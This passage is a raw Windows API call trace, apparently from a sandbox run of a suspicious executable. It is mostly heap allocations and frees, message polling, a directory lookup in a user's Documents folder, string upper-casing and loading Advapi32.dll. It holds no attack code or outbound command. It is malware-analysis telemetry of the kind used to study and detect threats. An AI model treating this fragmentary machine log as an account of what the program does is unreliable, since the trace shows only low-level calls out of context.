lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0220.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0220.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0220.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.886] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0220.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0220.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0220.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0220.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0220.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0220.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0220.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.889] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/uhe R_MajVPhj", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15d0d200, ftCreationTime.dwHighDateTime=0x1d5d667, ftLastAccessTime.dwLowDateTime=0x5ecd6570, ftLastAccessTime.dwHighDateTime=0x1d5cba1, ftLastWriteTime.dwLowDateTime=0x5ecd6570, ftLastWriteTime.dwHighDateTime=0x1d5cba1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uhe R_MajVPhj", cAlternateFileName="UHER_M~1")) returned 0x9e1eb8 [0220.889] FindClose (in: hFindFile=0x9e1eb8 | out: hFindFile=0x9e1eb8) returned 1 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0220.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0220.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0220.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.891] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.891] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.892] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.892] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0220.892] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.892] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.892] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.892] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0220.892] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0220.892] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.893] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0220.894] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.894] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0220.896] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.896] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.896] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.896] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0220.896] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: 